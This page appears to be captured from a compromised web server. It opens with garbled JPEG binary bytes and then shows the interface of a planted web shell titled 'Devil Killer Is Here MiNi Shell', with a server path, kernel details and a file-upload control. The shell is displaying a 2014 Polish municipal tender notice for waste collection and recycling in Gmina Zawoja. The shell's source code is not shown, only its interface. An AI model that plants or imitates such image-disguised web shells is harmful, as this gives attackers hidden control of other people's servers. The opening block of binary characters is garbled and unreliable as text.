JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140704/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140704/145237-N-2014.html

<p class="kh_header"><b>Zawoja: ODBIERANIE I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH Z TERENU GMINY ZAWOJA  W ROKU 2014</b><br>
<b>Numer ogłoszenia: 145237 - 2014; data zamieszczenia: 04.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zawoja , Zawoja 1307, 34-222 Zawoja, woj. małopolskie, tel. 33 8775-015, faks 33 8775-015.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawoja.ug.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIERANIE I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH Z TERENU GMINY ZAWOJA  W ROKU 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
Przedmiotem zamówienia jest wykonanie usługi polegającej na :
odbiorze odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Zawoja w latach 2014
zagospodarowanie odpadów komunalnych odebranych z terenu Gminy Zawoja od nieruchomości zamieszkałych i niezamieszkałych w latach 2014

Przedmiot zamówienia należy realizować zgodnie z wymaganiami prawnymi określonymi w :
dyrektywie Parlamentu Europejskiego i rady 2008/98/WE z dnia 19 listopada 2008r.w sprawie odpadów oraz uchylającej niektóre dyrektywy (Dz.U.UE.L2008.312.3),
ustawie z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach 
(t. j. Dz. U. z 2012 poz.391),
Rozporządzeniu Ministra Środowiska z dnia 15.05.2012r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystości ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 poz. 630),
Rozporządzenie Ministra Środowiska z dnia 11.09.2012r. w sprawie mechanicznobiologicznego przetwarzania zmieszanych odpadów komunalnych (Dz. U. z 2012 poz.1052),
Rozporządzeniu Ministra Środowiska z dnia 29.05.2012r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 poz. 645),
Rozporządzenia Ministra Środowiska z dnia 25.05.2012r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U. z 2012 poz.676),
uchwale Nr XXV/398/12 z dnia 2 lipca 2012r. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego wraz ze zmianami.
uchwale nr XXX/257/2012 RADY GMINY ZAWOJA z dnia 28 grudnia 2012 r.       w sprawie Regulaminu utrzymania czystości i porządku na terenie Gminy Zawoja
Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013, nr 0, poz.122),
ustawą z dnia 27 kwietnia 2001r.  Prawo ochrony środowiska (Dz. U. z 2008 r. Nr 25, poz. 150 ze zm.), 
ustawą z dnia 14 grudnia 2012r. o odpadach ( Dz. U. 2013 nr 0 poz. 21.), 
rozporządzenia Ministra Środowiska w sprawie bezpieczeństwa i higieny pracy przy gospodarowaniu odpadami komunalnymi.

3.Charakterystyka Gminy Zawoja
a) Liczba sołectw: 8 sołectw o nazwach -  Zawoja Przysłop, Zawoja Dolna, Zawoja Centrum, Zawoja Wełcza, Zawoja Mosorne, Zawoja Widły, Skawica Centrum, Skawica Sucha Góra.
b)  Powierzchnia całkowita gminy: 128,8  km2.
c)  Liczba mieszkańców wg ewidencji ludności: 9 138 (stan na 31.12.2013r.).
d)	Mieszkańcy zamieszkują ok. 3,2 tys. gospodarstw domowych 
e)  Liczba nieruchomości niezamieszkałych ok. 200
e)  Łączna długość trasy odbioru odpadów wynosi ok. 90 kilometrów.
Szczegółowy opis przedmiotu zamówienia:
4.1.	Przedmiotem zamówienia jest odbiór i zagospodarowanie (odzysk lub unieszkodliwienie) wszystkich odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Zawoja w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach  (Dz. U. z 2012 r. poz. 391), zapisami uchwały sejmiku Województwa Małopolskiego Nr XXV/397/12 z dnia 2 lipca 2012 r. - Planu Gospodarki Odpadami Województwa Małopolskiego oraz zapisami uchwały nr XXX/257/2012 RADY GMINY ZAWOJA z dnia 28 grudnia 2012 r. w sprawie Regulaminu utrzymania czystości i porządku na terenie Gminy Zawoja wraz ze zmianami.
4.2.	Zakres przedmiotu zamówienia obejmuje odbiór i zagospodarowanie,  w szczególności:
a)	Zmieszanych niesegregowanych odpadów komunalnych o kodzie 20 03 01 zgromadzonych w workach, pojemnikach -koloru czarnego-dotyczy właścicieli nieruchomości, którzy zadeklarowali nieselektywny sposób gromadzenia odpadów.
b)	Segregowanych ( gromadzonych w sposób selektywny- zgromadzonych           w workach, pojemnikach ) podanych poniżej rodzajów odpadów:
b.1.  Odpadów ulegające biodegradacji o kodzie 20 02 01,
b.2.  Papier i tektura ( kod 20 01 01, 15 01 01),
b.3.  Tworzywa sztuczne ( kody 20 01 39, 15 01 02),
b.4.  Opakowania wielomateriałowe ( kod 15 01 05),
b.5.  Metal ( kod 15 01 04, 20 01 40),
b.6.  Zużyte opony (kod 16 01 03),
b.7.  Szkło ( kod 20 01 02, 15 01 07),
b.8.  Żużle i popioły z palenisk domowych (pieców, kominów),
b.9. Odpady komunalne niewymienione w innych grupach (kod 20 03 99)
b.10.Odpady budowlane z drobnych remontów nie wymagających zgłoszenia zamiaru prowadzenia robót lub uzyskania pozwolenia na budowę,
c)Odpadów niebezpiecznych powstających w gospodarstwach domowych ( tj. chemikalia, zużyte baterie i akumulatory i inne) o kodach 20 01 13, 20 01 14, 20 01 15, 20 01 17, 20 01 19, 20 01 21, 20 01 27, 20 01 29, 20 01 33,
d)Przeterminowanych leków o kodzie 20 01 32,
e)Zużytego  sprzętu elektrycznego i elektronicznego o kodach 20 01 35, 20 01 36, 20 01 23,
f)Odpadów wielkogabarytowych kodzie 20 03 07, gromadzonych w pojemnikach usytuowanych przy zamieszkałych budynkach mieszkalnych oraz w ogólnodostępnym punkcie zbiórki odpadów segregowanych  i problematycznych.
g)	Inne niewymienione frakcje zbierane w sposób selektywny     kod 20 01 99.
4.3.	W ramach zagospodarowania odpadów podmiot odbierający odpady zobowiązany jest do przekazywania odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnej lub zastępczej regionalnej instalacji do przetwarzania odpadów komunalnych, właściwej dla regionu południowego zgodnie z uchwałą Nr XXV/397/12 Sejmiku Województwa Małopolskiego z dnia 2 lipca 2012r. w sprawie wykonania -Planu Gospodarki Odpadami Województwa Małopolskiego. 
W przypadku selektywnie zebranych odpadów komunalnych, w ramach zagospodarowania odpadów, zobowiązany jest do ich przekazywania do instalacji odzysku i unieszkodliwiania, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 20 ustawy z dnia 14 grudnia 2012 r. o odpadach. 

4.4.	Odpady komunalne, zbierane w sposób selektywny  przez  właścicieli nieruchomości zamieszkałych i niezamieszkałych  będą  gromadzone w następujący sposób:
a) papier i tektura / w tym opakowania/- kolor worka lub pojemnika niebieski
b) szkło / w tym opakowania/- kolor worka lub pojemnika zielony,
c) tworzywa sztuczne / w tym opakowania/- kolor worka lub pojemnika żółty,
d) metale / w tym opakowania/ - pomarańczowy,
e) opakowania wielomateriałowe - kolor worka lub pojemnika szary
f)  odpady ulegające biodegradacji - fioletowy
g) odpady zielone (trawę, liście, zrębki drewniane) - brązowy
h) pozostałe odpady gromadzone w sposób selektywny - kolor worka lub pojemnika -czarny
 
4.5. Wykonawca zobowiązany będzie do zaoferowania i sukcesywnego dostarczania właścicielom nieruchomości worków na odpady niesegregowane (zmieszane) oraz odpady segregowane przez okres realizacji przedmiotowego zamówienia -w systemie jeden za jeden. Worki powinny być wykonane z przezroczystej folii LDPE umożliwiającej szybką ocenę zawartości:
- worki koloru niebieskiego - o poj.60 litrów, grubość 60 mikronów, opisane: 
GMINA ZAWOJA -PAPIER I TEKTURA,
- worki koloru zielonego - o poj.60 litrów, grubość 60 mikronów, opisane:                  
GMINA ZAWOJA - SZKŁO,
- worki koloru żółtego - o poj.60 litrów, grubość 60 mikronów, opisane:                     
GMINA ZAWOJA - TWORZYWA SZTUCZNE,
- worki koloru pomarańczowego - o poj.60 litrów, grubość 60 mikronów, opisane: 
GMINA ZAWOJA - METALE,
- worki koloru szarego - o poj.60 litrów, grubość 60 mikronów, opisane: 
GMINA ZAWOJA - OPAKOWANIA WIELOMATERIAŁOWE,
- worki koloru fioletowego - o poj.40 litrów, grubość 60 mikronów, opisane: 
GMINA ZAWOJA - BIOODPADY,
- worki koloru brązowego - o poj.60 litrów, grubość 60 mikronów, opisane: 
GMINA ZAWOJA - ODPADY ZIELONE,
- worki koloru czarnego - o poj.80 litrów, grubość 60 mikronów, opisane: 
GMINA ZAWOJA -POZOSTAŁE ODPADY (ZMIESZANE),
Wybranemu wykonawcy zostaną ewentualnie przekazane wzory dodatkowych symboli oraz opisów, które będą musiały być umieszczone na workach, w terminie 7 dni od daty podpisania umowy.
W celu rozprowadzania worków Wykonawca dostarcza każdemu właścicielowi nieruchomości worki w systemie jeden za jeden oraz tworzy punkty dystrybucji (lub wykorzystuje istniejące placówki, sklepy itp.), co najmniej trzy punkty w Gminie Zawoja. Wykonawca tworzy te punkty dystrybucji po wcześniejszym uzgodnieniu z Zamawiającym (wymagana pisemna akceptacja Zamawiającego). 
Punkty dystrybucji worków  Wykonawca utworzy od  21 lipiec 2014r. 
Zamawiający szacuje, że w okresie obowiązywania umowy Wykonawca zobowiązany będzie do dostarczenia właścicielom nieruchomości łącznie    ok. 50 000 szt. worków.  W przypadku konieczności dostarczenia większej ilości worków niż szacowana, Wykonawca dostarczy bezpłatnie właścicielom nieruchomości worki.
4.6.Wykonawca zobowiązany jest dostarczyć metalowe pojemniki  o pojemności 120l i 1100l na popiół do budynków użyteczności publicznej   w ilości:
- pojemniki o pojemności 120 l - 17 szt.
- pojemniki o pojemności 1100 l - 2 szt.
Miejsca dostarczenia zostaną wskazane w terminie 7 dni od daty podpisania umowy.
Wykonawca zobligowany jest do magazynowania popiołów i żużli na swojej bazie w zamykanych kontenerach lub pod zadaszeniem.
4.7. Wykonawca zobowiązany będzie najpóźniej do 21 lipca 2014 r.  do zorganizowania, wyposażenia Gminnego punktu zbiórki odpadów problematycznych i selektywnych na terenie Gminy Zawoja a następnie prowadzenia go w trakcie obowiązywania zamówienia. Ogólnodostępny punkt będzie czynny minimum  trzy razy w tygodniu w godzinach od 8.00 do 15.00 - w tym raz w sobotę.
Gminny punkt musi być wyposażony w kontenery do selektywnej zbiórki odpadów zgodnie z zapisami regulaminu utrzymania czystości i porządku na terenie gminy Zawoja odnośnie rodzajów odpadów gromadzonych selektywnie. Zamawiający przekaże Zamawiającemu w celu wyposażenia gminnego punktu:                      
1 pojemnik o poj. 500l na akumulatory; 
1 pojemnik o poj. 500l na świetlówki i żarówki, 
1 pojemnik o poj. 120l na baterie; 
3 pojemniki o poj. 1500l na szkło; 
3 pojemniki o poj. 1500l na tworzywa sztuczne; 
3 pojemniki o poj. 1500l na opakowania wielomateriałowe. 
Przekazanie pojemników nastąpi przed dniem otwarcia gminnego punktu.
Pozostałe pojemniki zapewnia Wykonawca.  
W Gminnym punkcie będą przyjmowane odpady wymienione w punkcie 4.2.     (od  pkt. b do pkt. f ). 
4.8. Wykonawca zobowiązany będzie dostarczyć i ustawić w wyznaczonych przez Zamawiającego aptekach i budynkach użyteczności publicznej: -2 pojemników do selektywnego zbierania leków, - 3 pojemniki do selektywnego zbierania baterii. 
Zamawiający przekaże w/w pojemniki Wykonawcy w terminie przed   21 lipca br.
4.9. Wykonawca w ramach realizacji przedmiotu zamówienia nie będzie mógł mieszać selektywnie zebranych odpadów komunalnych z niesegregowanymi (zmieszanymi) odpadami komunalnymi. 
4.10. W celu realizacji przedmiotu zamówienia Wykonawca obowiązany jest posiadać bazę magazynowo-transportową oraz o odpowiednim stanie technicznym  wyposażenie umożliwiające odbieranie odpadów komunalnych od właścicieli nieruchomości - zgodnie ROZPORZĄDZENIEM MINISTRA ŚRODOWISKA z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z dnia 25 stycznia 2013 r. nr 0 poz. 122 ).
4.11. Zamawiający zaleca zapoznanie się z warunkami terenowymi związanymi z realizacją zamówienia  - zamawiający będzie wymagał,  aby na drogach będących w zarządzie zamawiającego i dojazdach do posesji był użyty właściwy tabor transportowy, nie powodujący niszczenia dróg (część dróg wąska, ze znacznym spadkiem podłużnym, ograniczonymi warunkami manewrowania).

4.12. Częstotliwość wywozu odpadów, według Regulaminu utrzymania czystości i porządku na terenie Gminy Zawoja:
a) z pojemników, worków przeznaczonych do selektywnej zbiórki odpadów w regularnych odstępach czasu uniemożliwiających ich przepełnienie -   nie rzadziej niż raz na miesiąc- wg harmonogramu zatwierdzonego przez zamawiającego,
b) z pojemników, worków przeznaczonych dla odpadów zmieszanych w regularnych odstępach czasu uniemożliwiających ich przepełnienie -  nie rzadziej niż dwa razy na miesiąc - wg harmonogramu zatwierdzonego przez zamawiającego,
c) z pojemników na żużle i popioły z kotłów paleniskowych - co dwa tygodnie  w okresie zimowym, raz na miesiąc w okresie letnim - wg harmonogramu zatwierdzonego przez zamawiającego.
c) Odbiór odpadów wielkogabarytowych, opon, zużytego sprzętu elektrycznego i elektronicznego będzie następował jeden raz w okresie obowiązywania umowy / na jesień/ roku na zasadzie -akcji -ogłoszonej wcześniej przez Zamawiającego w uzgodnieniu z Wykonawcą, ze specjalnie do tego wyznaczonych miejsc zbiórki, na które Wykonawca zobowiązany jest do ewentualnego dostarczyć kontenerów o pojemności uzgodnionej                           z Zamawiającym. 
d) przeterminowane leki (kod 20 01 32) -w wyznaczonych aptekach - w godzinach ich pracy. Do zadań Wykonawcy będzie należało odebranie tych  odpadów z aptek oraz podstawienie pojemników do zbierania. Wykonawca zobowiązany będzie monitorować stan zapełnienia pojemników i odbierać odpady w takiej częstotliwości, aby nie powodowało                                 to przepełnienia  tych pojemników.
e) baterie (kod 20 01 33) - w punktach użyteczności publicznej / w 6 szkołach, budynek UG Zawoja/, gdzie znajdować się będą pojemniki                                                                     do zbierania odpadów - w godzinach ich pracy.  Wykonawca zobowiązany będzie monitorować stan zapełnienia pojemników i odbierać  odpady w takiej częstotliwości, aby nie powodowało to  przepełnienia tych pojemników.
4.13. Wykonawca ponosi całkowitą odpowiedzialność za prawidłowe gospodarowanie odebranymi odpadami zgodnie z przepisami obowiązującymi w tym zakresie. Dotyczy to m.in. ewentualnego przeładunku odpadów, transportu odpadów, spraw formalno-prawnych związanych z odbieraniem i dostarczaniem odpadów uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych. Zakazuje się mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości.
4.14. Odpady zebrane od właścicieli nieruchomości z terenu Gminy Zawoja Wykonawca zobowiązany jest zagospodarować (poddać odzyskowi lub unieszkodliwieniu zgodnie z obowiązującym prawem), w tym zmieszane odpady komunalne, odpady ulegające biodegradacji oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania przekazywać do regionalnych instalacji do przetwarzania odpadów komunalnych oraz przedstawienie Zamawiającemu jeden raz na miesiąc dowodów potwierdzających wykonanie tych czynności, tj. karty przekazania odpadów.
4.15. Wykonawca odpowiedzialny jest za osiąganie poziomów odzysku odpadów komunalnych z uwzględnieniem poziomów odzysku wskazanych w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U z 2012r., poz. 391), Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 roku w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U z 2012r., poz. 645), oraz Rozporządzeniu Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U z 2012r. poz. 676).
4.16. Wykonawca zobowiązany będzie do monitorowania obowiązku ciążącego na właścicielu nieruchomości w zakresie selektywnego zbierania odpadów komunalnych. Zamawiający wyposaży wykonawcę w 2 szt. mobilnych czytników kodów kreskowych, które Wykonawca będzie wykorzystywał, przy odbiorze odpadów gromadzonych przez właścicieli nieruchomości w workach i pojemnikach, do sczytywania danych o ilości, rodzaju i właścicielu odpadów. Wykonawca wyposaży podmiot w program umożliwiający sczytywanie danych z czytników. Codziennie wykonawca będzie odczytywał dane z czytnika, archiwizował je na nośniku elektronicznym i raz w tygodniu (piątek) dostarczał do UG Zawoja.                    Niezależnie od dostarczania danych na nośniku elektroniczny będzie sporządzał miesięczne i kwartalne sprawozdania obejmujące w szczególności zestawienia ilości oraz rodzaju zebranych odpadów. W przypadku stwierdzenia podczas odbioru odpadów, że właściciel nieruchomości nie wywiązuje się z obowiązku w zakresie segregacji odpadów (np. gdy w worku przeznaczonym na odpady segregowane będą znajdować się odpady zmieszane, gdy w worku przeznaczonym na daną frakcję odpadów segregowanych będą znajdować się odpady innej frakcji, jeżeli w pojemniku na odpady segregowane będą znajdowały się odpady,  które należy umieścić w workach na odpady zmieszane lub w worku czarnym będą znajdować się odpady, które powinny być gromadzone w workach kolorowych  do segregacji itp.), Wykonawca zobowiązany będzie w terminie 2 dni roboczych od dnia zaistnienia opisanej powyżej sytuacji do poinformowania drogą elektroniczną przy pomocy zapisanych danych w czytnikach kodów kreskowych Zamawiającego o niewywiązaniu się z obowiązków segregacji odpadów przez właściciela nieruchomości. Do informacji Wykonawca zobowiązany będzie załączyć dokumentację - protokół z zaistnienia takiego zdarzenia wraz z dokumentacją fotograficzną - podpisany przez Wykonawcę. Z dokumentacji musi jednoznacznie wynikać, jakiej dotyczy nieruchomości, w jakim dniu i o jakiej godzinie doszło do ustalenia w/w zdarzenia. 
4.17. Wykonawca zobowiązany jest do:
a)Ważenia wszystkich odebranych odpadów komunalnych w punkcie wagowym zlokalizowanym w miejscu bazy magazynowo-transportowej oraz w miejscu przekazywania odpadów do dalszego postępowania z nimi. 
b)Przekazywania odpadów do uprawnionego przedsiębiorcy wykonującego działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych i uzyskania od niego potwierdzenia odbioru odpadów zebranych z terenu Gminy Zawoja na karcie przekazania odpadów.
c)	Terminowego zbierania i wywożenia odpadów zgodnie z harmonogramem.
Wykonawca zobowiązany jest sporządzić harmonogram zbiórki odpadów komunalnych z terenu nieruchomości zamieszkałych przed podpisaniem umowy oraz harmonogram zbiórki odpadów wielkogabarytowych i innych, które będą stanowić załącznik do umowy. Harmonogram powinien odpowiadać następującym wytycznym:
- powinien być sformułowany w sposób przejrzysty, jasny, pozwalający                   na szybkie zorientowanie się co do konkretnych dat odbierania odpadów, jak też regularności i powtarzalności odbierania odpadów poszczególnych rodzajów,
- nie powinien zawierać żadnych dodatkowych treści ponad informacje związane z wykonywaniem zamówienia, w szczególności reklam, informacji propagandowych itd. 
- powinien wskazywać: miejscowość, daty odbierania poszczególnych rodzajów odpadów. 
d)Przeładowywania odpadów w legalnym i przystosowanym do tego miejscu.
e)Niezwłocznego zawiadomienia Zamawiającego o okolicznościach przeszkadzających w prawidłowym wykonaniu usługi.
f)Rozliczania się z wykonywanych usług poprzez przedstawienie wymaganych przepisami dokumentów.
g)Utrzymania w należytym stanie technicznym, sanitarnym i porządkowym narzędzi i urządzeń wykorzystywanych na potrzeby realizacji umowy.
h)W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamkniecie drogi), gdy nie jest możliwa realizacja usługi zgodnie z umową, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym  i Wykonawcą. W takich przypadkach Wykonawcy nie przysługuje dodatkowe wynagrodzenie.
i)Obowiązkiem Wykonawcy będzie odbieranie odpadów komunalnych od wszystkich właścicieli nieruchomości zamieszkałych położonych na terenie gminy Zawoja. Usługa obejmuje zapewnienie przez Wykonawcę dojazdu do punków trudnodostępnych (szczególnie zimą i w okresie wzmożonych opadów deszczu i śniegu) poprzez zorganizowanie środków transportu, które umożliwią odbiór odpadów z punktów adresowych o problematycznej lokalizacji.
j)Wykonawca zobowiązany jest do spełniania przez cały okres wykonywania usługi wszystkich wymogów wynikających z obowiązujących przepisów, dotyczących odbierania i zagospodarowania odpadów komunalnych.
4.18. Wykonawca będzie prowadził i przedkładał Zamawiającemu dokumentację   z realizacji przedmiotu zamówienia, tj.:
a)	Miesięczne zestawienie odebranych odpadów komunalnych zmieszanych,
w terminie 10 dni od zakończenia danego miesiąca.
b)Miesięczne zestawienie odebranych odpadów komunalnych segregowanych, w terminie 10 dni od zakończenia danego miesiąca.
c)zestawienie odebranych odpadów komunalnych segregowanych pochodzących ze zużytego sprzętu elektrycznego i elektronicznego oraz odpadów problematycznych.
d)Wykonawca będzie zobowiązany do dostarczania Zamawiającemu w wersji papierowej sprawozdań kwartalnych o jakich mowa w art. 9 n ustawy o Utrzymaniu czystości i porządku w gminach. Sprawozdania powinny być sporządzone zgodnie z rozporządzeniem Ministra Środowiska z 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami, a w przypadku zmiany rozporządzenia, zgodnie z obowiązującymi wzorami druków. 
e)W celu umożliwienia sporządzenia przez Zamawiającego rocznego sprawozdania z realizacji zadań z zakresu gospodarowania odpadami komunalnymi, o którym mowa w art. 9q ustawy, Wykonawca zobowiązany będzie przekazać Zamawiającemu niezbędne informacje umożliwiające sporządzenie sprawozdania. Wykonawca zobowiązany będzie również do przedkładania Zamawiającemu innych informacji nt. odbioru, unieszkodliwiania i segregacji odpadów jeśli w trakcie realizacji zamówienia na Zamawiającego nałożony zostanie obowiązek sporządzania innych sprawozdań z zakresu gospodarki odpadami. Dotyczy to tylko informacji w posiadaniu, których będzie Wykonawca a nie Zamawiający. 
f)Wykonawca zobowiązany będzie do przedkładania Zamawiającemu informacji, o jakich mowa w pkt. 4.16. opisu przedmiotu zamówienia. 
